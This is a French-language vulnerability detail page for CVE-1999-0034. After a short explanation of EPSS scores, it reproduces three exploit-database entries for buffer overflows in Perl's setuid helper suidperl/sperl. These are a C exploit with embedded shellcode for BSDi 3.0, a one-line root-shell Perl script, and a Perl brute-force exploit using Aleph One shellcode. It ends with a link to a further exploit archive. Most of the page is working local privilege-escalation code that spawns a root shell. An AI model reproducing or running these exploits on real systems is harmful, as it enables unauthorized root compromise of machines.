CVE-1999-0034 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

/* (BSDi)suidperl[] buffer overflow, by v9[[email protected]]. this is that old buffer overflow in suidperl, but i never saw any version of it for BSDi. so, here it is. this gives euid=0. (BSDi/3.0) */ #define PATH "/usr/bin/suidperl" /* path to suidperl on BSDi/3.0. */ #define DEFAULT_OFFSET -5000 /* general offset, a lot of room. */ static char exec[]= "\xeb\x1f\x5e\x31\xc0\x89\x46\xf5\x88\x46\xfa\x89\x46\x0c" /* 14 characters. */ "\x89\x76\x08\x50\x8d\x5e\x08\x53\x56\x56\xb0\x3b\x9a\xff" /* 14 characters. */ "\xff\xff\xff\x07\xff\xe8\xdc\xff\xff\xff\x2f\x62\x69\x6e" /* 14 characters. */ "\x2f\x73\x68\x00"; /* 4 characters; 46 characters total. */ long pointer(void){__asm__("movl %esp,%eax");} int main(int argc,char **argv){ char eip[2048],buf[4096]; int i,offset; long ret; printf("[ (BSDi)suidperl[]: buffer overflow, by: v9[[email protected]]. ]\n"); if(argc>1){offset=atoi(argv[1]);} else{offset=DEFAULT_OFFSET;} ret=(pointer()-offset); eip[0]=0x01; for(i=1;i<2048;i+=4){*(long *)&eip[i]=ret;} eip[1248]=0x0; for(i=0;i<(4096-strlen(exec)-strlen(eip));i++){*(buf+i)=0x90;} memcpy(buf+i,exec,strlen(exec)); memcpy(buf,"EXEC=",5);putenv(buf); printf("*** [data]: return address: 0x%lx, offset: %d.\n",ret,offset); if(execlp(PATH,"suidperl",eip,0)){ printf("*** [error]: could not execute %s successfully.\n",PATH); exit(1); } } // milw0rm.com [2000-11-21]

#!/usr/bin/suidperl -U $ENV{PATH}="/bin:/usr/bin"; $>=0;$<=0; exec("/bin/bash"); # milw0rm.com [1996-06-01]

source: https://www.securityfocus.com/bid/708/info Several buffer overflows were found in the Perl helper application 'suidperl' or 'sperl'. When this program is installed setuid root the overflows may lead to a local root compromise. #!/usr/bin/perl # yes, this suidperl exploit is in perl, isn't it wonderful? :) $| = 1; $shellcode = "\x90" x 512 . # nops "\xbc\xf0\xff\xff\xbf" . # movl $0xbffffff0,%esp # "standard shellcode" by Aleph One "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" . "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" . "\x80\xe8\xdc\xff\xff\xff/bin/sh"; # start and end of .data # adjust this using /proc/*/maps $databot = 0x080a2000; $datatop = 0x080ab000; # trial and error loop $address = $databot + 4; while ($address < $datatop) { $smash_me = $shellcode . ('A' x (2052 - length($shellcode))) . (pack("l", $address) x 1000) . ('B' x 1000); $pid = fork(); if (!$pid) { exec('/usr/bin/sperl5.003', $smash_me); } else { wait; if ($? == 0) { printf("THE MAGIC ADDRESS WAS %08x\n", $address); exit; } } $address += 128; }

source: https://www.securityfocus.com/bid/708/info Several buffer overflows were found in the Perl helper application 'suidperl' or 'sperl'. When this program is installed setuid root the overflows may lead to a local root compromise. https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19547.tgz